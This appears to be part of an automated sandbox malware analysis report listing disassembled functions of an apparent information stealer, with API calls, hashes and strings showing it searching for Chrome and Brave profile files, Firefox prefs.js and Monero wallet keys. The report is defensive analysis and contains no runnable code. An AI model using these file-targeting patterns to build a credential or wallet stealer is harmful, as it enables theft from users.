                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 0dc930088f27e91d2c22c32c6a19ec0e1776b23e34f7590312516d2c262e2226
                              • Instruction ID: 51aec2a465d050d3686c595261778b9b5bf63aaa2b31873b4b724ac97c91f4fa
                              • Opcode Fuzzy Hash: 0dc930088f27e91d2c22c32c6a19ec0e1776b23e34f7590312516d2c262e2226
                              • Instruction Fuzzy Hash: 4CA130B191020CABDB34EB64DC85FFE7378BB88700F048588B60D96581EB759B85CF62
                              Function 009EBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00A00B32,00A00B2B,00000000,?,?,?,00A013F4,00A00B2A), ref: 009EBEF5
                              • StrCmpCA.SHLWAPI(?,00A013F8), ref: 009EBF4D
                              • StrCmpCA.SHLWAPI(?,00A013FC), ref: 009EBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EC7BF
                              • FindClose.KERNEL32(000000FF), ref: 009EC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: b0d7de9c3eb3a7730e22ee3d28102c7f629f65bcf3135c291d7379d4b65fef89
                              • Instruction ID: 551e9ee96da8a2014f7cd1ca5dc3bb6fc5c1b05f5108bebc3f3ea8e2251ecf11
                              • Opcode Fuzzy Hash: b0d7de9c3eb3a7730e22ee3d28102c7f629f65bcf3135c291d7379d4b65fef89
                              • Instruction Fuzzy Hash: 304234B291010CABCB14FB60DD56FFD737DABD4300F408568BA0A96191EE74AF49CB96
                              Function 009F4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 009F492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 009F4943
                              • StrCmpCA.SHLWAPI(?,00A00FDC), ref: 009F4971
                              • StrCmpCA.SHLWAPI(?,00A00FE0), ref: 009F4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009F4B7D
                              • FindClose.KERNEL32(000000FF), ref: 009F4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 117be5635da298c2376305cb7b8bcb61a511249547456e38486f172bc35abbed
                              • Instruction ID: 1ef2e68365083b3a756dadb7b0968808c3383d1409686cf963bfffcb9fec5af8
                              • Opcode Fuzzy Hash: 117be5635da298c2376305cb7b8bcb61a511249547456e38486f172bc35abbed
                              • Instruction Fuzzy Hash: 0E6114B1910219ABCB34EBA4DC45FFE737CBB88701F044598B60996181EB75EB85CF91
                              Function 009F4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009F4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F4587
                              • wsprintfA.USER32 ref: 009F45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 009F45BD
                              • StrCmpCA.SHLWAPI(?,00A00FC4), ref: 009F45EB
                              • StrCmpCA.SHLWAPI(?,00A00FC8), ref: 009F4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009F468B
                              • FindClose.KERNEL32(000000FF), ref: 009F46A0
                              • lstrcat.KERNEL32(?,013BE3B0), ref: 009F46C5
                              • lstrcat.KERNEL32(?,013BD1F8), ref: 009F46D8
                              • lstrlen.KERNEL32(?), ref: 009F46E5
                              • lstrlen.KERNEL32(?), ref: 009F46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 0533a971a69fc0ea6e4a29c31d556b63cc2a89962c166d7bad9e862eeaa89569
                              • Instruction ID: b13d0343f60f2df5ef9eac9918d40980b61d500c19456e0293a91d3ab4f36f7f
                              • Opcode Fuzzy Hash: 0533a971a69fc0ea6e4a29c31d556b63cc2a89962c166d7bad9e862eeaa89569
                              • Instruction Fuzzy Hash: 3F5132B195021CABCB64EB70DC89FFE737CAB58700F404998B61996190EF74DB858F92
                              Function 009F3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 009F3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 009F3EDA
                              • StrCmpCA.SHLWAPI(?,00A00FAC), ref: 009F3F08
                              • StrCmpCA.SHLWAPI(?,00A00FB0), ref: 009F3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009F406C
                              • FindClose.KERNEL32(000000FF), ref: 009F4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: efd6c4c8c3993379bedc6c89ef220c5e8b84389fdf876d81620c1892a021f55c
                              • Instruction ID: 394481b34840c6b2a964ccb142b595f43c0ab5579eae64bd1678e254741add07
                              • Opcode Fuzzy Hash: efd6c4c8c3993379bedc6c89ef220c5e8b84389fdf876d81620c1892a021f55c
                              • Instruction Fuzzy Hash: C75132B6910218ABCB24EBB0DC85FFE737CBB84300F404588B75996180DB75EB868F55
                              Function 009EED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 009EED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 009EED55
                              • StrCmpCA.SHLWAPI(?,00A01538), ref: 009EEDAB
                              • StrCmpCA.SHLWAPI(?,00A0153C), ref: 009EEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EF2AE
                              • FindClose.KERNEL32(000000FF), ref: 009EF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: e45c4b1d215689123b9603ff27c5c86b55c2ce1c21aae25d3c760ff7048ff75c
                              • Instruction ID: e50aff57dcf210c8a2ad432e7e9abf4c0024aad5d473cc44d5b9f3764d95d2bb
                              • Opcode Fuzzy Hash: e45c4b1d215689123b9603ff27c5c86b55c2ce1c21aae25d3c760ff7048ff75c
                              • Instruction Fuzzy Hash: 41E1EFB191111CAADB55FB60DC52FFE7338AF94340F4045A9B60E62092EE706F8ACF56
                              Function 009EF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A015B8,00A00D96), ref: 009EF71E
                              • StrCmpCA.SHLWAPI(?,00A015BC), ref: 009EF76F
                              • StrCmpCA.SHLWAPI(?,00A015C0), ref: 009EF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EFAB1
                              • FindClose.KERNEL32(000000FF), ref: 009EFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 0f106f166408715ff19e79f4e9e7c93eb3a1521aa711721c00dd01335afd3a11
                              • Instruction ID: 618e4b68eab81a6ddb7056af233d569c60c69f414030b507e354979c6bd660ab
                              • Opcode Fuzzy Hash: 0f106f166408715ff19e79f4e9e7c93eb3a1521aa711721c00dd01335afd3a11
                              • Instruction Fuzzy Hash: EAB131B191010C9BCB24FF60DC96FFE7379AF94300F4085A9A50E96195EF70AB49CB96
                              Function 009E16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A0510C,?,?,?,00A051B4,?,?,00000000,?,00000000), ref: 009E1923
                              • StrCmpCA.SHLWAPI(?,00A0525C), ref: 009E1973
                              • StrCmpCA.SHLWAPI(?,00A05304), ref: 009E1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009E1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 009E1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009E1E20
                              • FindClose.KERNEL32(000000FF), ref: 009E1E32
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 7129556e686b1b2631b6d8aa6d82458b3e33755800fd7f5328f5e61a389f8ac4
                              • Instruction ID: 50c8327f398e448c8e6677afd3985170d8580286a99d30a1414a9d13682cd2b5
                              • Opcode Fuzzy Hash: 7129556e686b1b2631b6d8aa6d82458b3e33755800fd7f5328f5e61a389f8ac4
                              • Instruction Fuzzy Hash: 5812DEB191011CABDB19EB60DC96FFE7378AF94340F4045A9A60A62091EF706F89CF95
                              Function 009EDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A00C2E), ref: 009EDE5E
                              • StrCmpCA.SHLWAPI(?,00A014C8), ref: 009EDEAE
                              • StrCmpCA.SHLWAPI(?,00A014CC), ref: 009EDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009EE3E0
                              • FindClose.KERNEL32(000000FF), ref: 009EE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 745fca0e058a8d9cb923aa6c42383c6903efeccc8f50d72e588a5400a278d711
                              • Instruction ID: 8e84b1ad31affee874d7ae549f65713c7e7225949493d0c41c1428b3b69fbe05
                              • Opcode Fuzzy Hash: 745fca0e058a8d9cb923aa6c42383c6903efeccc8f50d72e588a5400a278d711
                              • Instruction Fuzzy Hash: AAF19DB181411DAADB25EB60DC95FFE7338BF94340F8045A9A60E62091EF706F8ACF55
                              Function 009EDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A014B0,00A00C2A), ref: 009EDAEB
                              • StrCmpCA.SHLWAPI(?,00A014B4), ref: 009EDB33
                              • StrCmpCA.SHLWAPI(?,00A014B8), ref: 009EDB49
